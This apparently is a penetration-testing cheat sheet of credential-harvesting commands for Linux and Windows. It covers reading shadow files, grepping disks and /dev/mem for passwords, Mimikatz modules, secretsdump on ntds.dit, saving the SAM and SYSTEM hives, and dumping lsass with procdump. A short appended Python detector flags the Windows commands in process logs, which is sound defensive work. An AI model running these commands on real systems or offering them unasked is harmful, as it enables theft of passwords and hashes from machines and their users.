Linux
/etc/shadow /etc/gshadow /etc/master.passwd /etc/spwd.db /etc/security/opasswd
find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
grep -rn '/' -ie "PASSWORD" 2>/dev/null
Search in memory →
strings /dev/mem -n10 | grep -i PASS
MimiPenguin → huntergregal/mimipenguin on GitHub
Windows
NTDSUTIL
PowerShell tool to gather the ntds.dit file. Then in Kali we can use:
secretsdump.py -ntds /root/ntds.dit -system /root/SYSTEM LOCAL
Mimikatz
Not really recommended, as any IT team should be able to detect it. It is, however, very powerful.
privilege::debug
token::elevate
lsadump::sam
lsadump::lsa
sekurlsa::logonpasswords
vault::cred
Manually:
reg save HKLM\SYSTEM System.dump
reg save HKLM\SAM Sam.dump
ProcDump
.\procdump64.exe -accepteula -ma lsass.exe c:\windows\tmp\lsass.dmp
Registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Good finds
dir /s *password*
findstr /si password *.txt
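
Detection side of the Windows commands above, as an added example that is not part of the original notes: a small matcher that flags those command lines in process-creation events. It assumes events that carry the full command line (for example Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled); the rule names and sample events are constructed for illustration.

```python
import re

# Patterns for the Windows credential-access commands listed in these notes.
# Rule names are labels invented for this example.
RULES = [
    ("lsass_memory_dump", re.compile(r"procdump(64)?(\.exe)?\b.*\s-ma\b.*\blsass", re.I)),
    ("sam_system_hive_save", re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("ntds_dit_access", re.compile(r"\bntdsutil\b|\bntds\.dit\b", re.I)),
    # Mimikatz is usually driven interactively, so this only fires when
    # module::command pairs are passed as process arguments.
    ("mimikatz_module", re.compile(r"\b(sekurlsa|lsadump|privilege|token|vault)::\w+", re.I)),
    ("registry_password_search", re.compile(r"\breg(\.exe)?\s+query\s+hk(lm|cu)\b.*\s/f\s+password\b", re.I)),
]

def match_rules(command_line):
    """Return the names of every rule the command line triggers."""
    return [name for name, rx in RULES if rx.search(command_line)]

def scan(events):
    """events: iterable of (host, user, command_line). Returns a list of alert dicts."""
    alerts = []
    for host, user, cmd in events:
        hits = match_rules(cmd)
        if hits:
            alerts.append({"host": host, "user": user, "rules": hits, "command_line": cmd})
    return alerts

# Constructed sample events: three should alert, two are benign look-alikes.
SAMPLE_EVENTS = [
    ("WS01", "alice", r".\procdump64.exe -accepteula -ma lsass.exe c:\windows\tmp\lsass.dmp"),
    ("WS01", "alice", r"reg save HKLM\SAM Sam.dump"),
    ("DC01", "svc_backup", r"reg query HKLM /f password /t REG_SZ /s"),
    ("WS02", "bob", r"reg query HKLM\SOFTWARE\Microsoft /v Version"),
    ("WS02", "bob", r"procdump64.exe -ma notepad.exe c:\temp\np.dmp"),
]

if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(a["host"], a["user"], ",".join(a["rules"]), "::", a["command_line"])
```

Command-line matching misses renamed binaries and interactive tool use, so treat it as one signal alongside monitoring of handle access to the lsass.exe process.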